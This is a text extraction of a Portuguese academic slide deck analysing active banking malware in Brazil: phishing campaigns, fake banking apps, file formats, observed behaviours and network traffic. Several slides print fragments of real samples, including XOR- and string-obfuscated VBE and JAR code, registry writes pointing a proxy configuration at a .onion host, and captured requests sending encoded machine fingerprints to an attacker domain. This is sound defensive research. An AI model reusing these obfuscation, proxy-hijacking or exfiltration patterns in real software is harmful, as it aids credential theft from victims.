On the Security of Application Installers & Online Software RepositoriesOn the Security of Application Installers & Online Software Repositories
On the Security of Application Installers & Online Software Repositories
 
UMLsec
UMLsecUMLsec
UMLsec
 
The Internet Banking [in]Security Spiral: Past, Present, and Future of Online...
The Internet Banking [in]Security Spiral: Past, Present, and Future of Online...The Internet Banking [in]Security Spiral: Past, Present, and Future of Online...
The Internet Banking [in]Security Spiral: Past, Present, and Future of Online...
 
Towards Malware Decompilation and Reassembly
Towards Malware Decompilation and ReassemblyTowards Malware Decompilation and Reassembly
Towards Malware Decompilation and Reassembly
 
Reverse Engineering Course
Reverse Engineering CourseReverse Engineering Course
Reverse Engineering Course
 

Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou?

  • 1. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? Marcus Botacin1 1Universidade Federal do Paran´a (UFPR) mfbotacin@inf.ufpr.br @MarcusBotacin An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 1 / 38 GTS’34
  • 2. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Neste mesmo GTS... Figura: https://tinyurl.com/yf2anfz2 An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 2 / 38 GTS’34
  • 3. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 3 / 38 GTS’34
  • 4. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Mensagem SMS. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 4 / 38 GTS’34
  • 5. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Site imitando a p´agina do Banco. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 5 / 38 GTS’34
  • 6. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Coleta de Informac¸˜oes da V´ıtima. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 6 / 38 GTS’34
  • 7. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Transmiss˜ao de Informac¸˜oes para o Atacante. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 7 / 38 GTS’34
  • 8. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Coleta de M´ultiplos Fatores de Autenticac¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 8 / 38 GTS’34
  • 9. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Transac¸˜ao Falhou (S´erio?). An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 9 / 38 GTS’34
  • 10. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: P´agina n˜ao ´e reconhecida como Maliciosa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 10 / 38 GTS’34
  • 11. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 11 / 38 GTS’34
  • 12. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 12 / 38 GTS’34
  • 13. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 13 / 38 GTS’34
  • 14. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 14 / 38 GTS’34
  • 15. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Aplicac¸˜oes Phishing. Figura: Aplicac¸˜ao Banc´aria Falsa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 15 / 38 GTS’34
  • 16. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Aplicac¸˜oes Phishing. Figura: Aplicac¸˜ao Banc´aria Falsa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 16 / 38 GTS’34
  • 17. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Quanto dura uma campanha de phishing? Figura: Campanha n˜ao cessa mesmo ap´os o termino do evento alvo. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 17 / 38 GTS’34
  • 18. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 18 / 38 GTS’34
  • 19. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Diversidade de Formatos. 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 2012 2013 2014 2015 2016 2017 2018 Samples(%) Year Evolution of threat’s filetype PE CPL .NET DLL JAR JS VBE Figura: Distribuic¸˜ao dos Formatos de Arquivos utilizados por malware. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 19 / 38 GTS’34
  • 20. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as VBE 1 Set Nics=obJWMIService.ExEcQuery("SELECT␣*␣FROM␣ Win32_NetworkAdapterConfiguration ␣WHERE␣ IPEnabled␣=␣True") C´odigo 1: Exemplar de malware VBE obtendo informac¸˜oes de sistema atrav´es da consulta SQL as bases de dados. 1 set objShell = CreateObject(CryptXor("c0+4","N0X") & ".Application") C´odigo 2: Exemplar de malware VBE instanciando um objeto a partir de uma string codificada usando operac¸˜oes XOR. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 20 / 38 GTS’34
  • 21. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as JAVA 1 public static void main(String args []){ 2 File jsjmj3194 = new File ((new StringBuilder( String.valueOf(bcvsnpdbxw4095 ("THKHBI ...", abdwwhftjb7743 )))).append("x").toString ()); C´odigo 3: Exemplar de malware JAR ofuscado. 1 if(jsjmj3194.exists ()) 2 System.exit (1); C´odigo 4: Exemplar de malware JAR confirmando a infecc¸˜ao. 1 Runtime.getRuntime ().exec ((new StringBuilder ()). append("rundll32␣SHELL32.DLL , ShellExec_RunDLL ␣") .append( qOggErFmPnJO6UUHp ).append(rQ47EvtcHUKw). toString ()); C´odigo 5: Exemplar de malware JAR carregando bibliotecas externas. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 21 / 38 GTS’34
  • 22. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as JavaScript 1 .protocol === "https:" ? "https ://s." : "http ://e.") + ".server.com/q.js" C´odigo 6: Exemplar de malware Javascript construindo uma URL em tempo de execuc¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 22 / 38 GTS’34
  • 23. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 23 / 38 GTS’34
  • 24. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Como os exemplares s˜ao detectados? 0% 10% 20% 30% PSW Downloader Generic Win32 Delf Dropper Luhe Suspicion: Delfi Autoit_c Inject2 unknown Detection Labels Distribuition Figura: R´otulos de Detecc¸˜ao por Antiv´ırus. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 24 / 38 GTS’34
  • 25. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Comportamentos Observados Tabela: Comparac¸˜ao dos comportamentos observados no dataset brasileiro e no trabalho de Bayer et al. Comportamento Brasil Bayer et al. (2009) Alterac¸˜ao de hosts 0.09% 1.97% Criac¸˜ao de arquivos 24.64% 70.78% Remoc¸˜ao de arquivos 12.09% 42.57% Modificac¸˜ao de arquivos 16.09% 79.87% Instalac¸˜ao de BHOs 1.03% 1.72% Tr´afego de Rede 96.47% 55.18% Criac¸˜ao de chaves de registro 29.93% 64.71% Criac¸˜ao de processos 16.83% 52.19% An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 25 / 38 GTS’34
  • 26. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Configurac¸˜ao Autom´atica de Proxy (PAC). 1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft Internet ExplorerSearchScopes {ID}| OSDFileURL| file:///C:/ Users/Win7/AppData/Local/TNT2/ Profiles/ e0e63dcbb29a2180f8300 / ose0e63dcbb29a2180f8300 .xml C´odigo 7: Trecho de um trac¸o de execuc¸˜ao de um exemplar de malware definindo uma configurac¸˜ao de proxy via arquivo PAC. 1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft WindowsCurrentVersion Internet Settings| AutoConfigURL|http:// p3vramfcx4ybpvnj .onion/ Bl5CHrZV.js?ip =143.106.Y.Z C´odigo 8: Trecho de um trac¸o de execuc¸˜ao de um exemplar de malware definindo uma configurac¸˜ao de proxy via registro do sistema operacional. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 26 / 38 GTS’34
  • 27. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 27 / 38 GTS’34
  • 28. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Uso de Protocolos Tabela: Comparac¸˜ao do tr´afego de rede exibido pelos exemplares de malware brasileiros e os observador por Bayer et al. Protocolo 2012(T) 2013(T) 2014(T) 2015(T) 2016(T) 2017(T) Bayer(09) TCP 40.87% 41.24% 56.19% 64.24% 74.86% 84.85% 45.74% UDP 52.76% 54.74% 52.00% 59.42% 74.86% 84.85% 27.34% ICMP 1.28% 1.70% 1.33% 5.63% 0.57% 1.17% 7.58% DNS 52.69% 54.73% 51.98% 49.04% 47.43% 74.59% 24.53% HTTP 38.63% 39.69% 52.03% 44.93% 74.86% 84.38% 20.75% SSL 5.30% 5.62% 4.64% 6.53% 10.29% 26.57% 0.23% SMTP 0.21% 0.01% 0.06% 0.21% 0.0% 0.0% N.A.1 1 N˜ao Dispon´ıvel An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 28 / 38 GTS’34
  • 29. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Exfiltrac¸˜ao de Informac¸˜oes. 1 GET maisumavezconta .info/escrita /? Client= Y29udGFkb3IwMw ==& GetMacAddress= NTI6NTQ6MDA6QTA6MDQ6MTk =& GetWinVersionAsStringWinArch = V2luZG93cyA3ICg2NCk =& VersaoModulo=djE=& GetPCName=V0lON19WTTE =& DetectPlugin=TuNv& DetectAntiVirus =T0ZG C´odigo 9: Trecho de um tr´afego de rede exemplificando um exemplar de malware que realiza o fingerprint da m´aquina infectada. 1 GET counter1.webcontadores.com :8080/ private/pointeur /pointeur.gif?|<hash >|600*800| pt|32|< serial >| computer|windows |7| internet + explorer |7| Brazil| BR|X|Y|City|University | -14400|0|1432126706| ok| C´odigo 10: Trecho de um tr´afego de rede exemplificando a coleta de informac¸˜oes de geolocalizac¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 29 / 38 GTS’34
  • 30. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede De onde partem os Ataques? Figura: Mapa dos Ataques. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 30 / 38 GTS’34
  • 31. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Dom´ınios Contatados Tabela: Tr´afego de Rede por dom´ınio (top-10). % Exemplares % Payloads Host 22.45% None google.com 22.43% None google-public-dns-a.google.com 5.34% 9.71% akamaitechnologies.com 4.50% 8.18 1e100.net 3.32% 6.04 amazonaws.com 1.50% 2.73 clouduol.com.br 1.27% 2.31 locaweb.com.br 0.94% None uol.com.br 0.77% None secureserver.net 0.69% None a-msedge.net An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 31 / 38 GTS’34
  • 32. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Limitac¸˜oes T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 32 / 38 GTS’34
  • 33. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Limitac¸˜oes Limitac¸˜oes & Trabalhos Futuros Limitac¸˜oes Apenas sistemas Windows. Apenas aplicac¸˜oes em modo usu´ario. Trabalhos Futuros Ampliac¸˜ao das an´alises. Monitorac¸˜ao cont´ınua. Colaborac¸˜oes e Parcerias. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 33 / 38 GTS’34
  • 34. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 34 / 38 GTS’34
  • 35. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes Conclus˜oes Principais Descobertas Infecc¸˜oes via phishing. Aplicac¸˜oes falsas. Variados formatos de arquivo. Exfiltrac¸˜ao de informac¸˜oes sens´ıveis. Armazenamento em servic¸os de nuvem. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 35 / 38 GTS’34
  • 36. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes Chamado para Ac¸˜ao! https://corvus.inf.ufpr.br/ Figura: Sistema web de an´alise de malware. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 36 / 38 GTS’34
  • 37. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes D´uvidas? T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 37 / 38 GTS’34
  • 38. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes D´uvidas? Contato mfbotacin@inf.ufpr.br @MarcusBotacin An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 38 / 38 GTS’34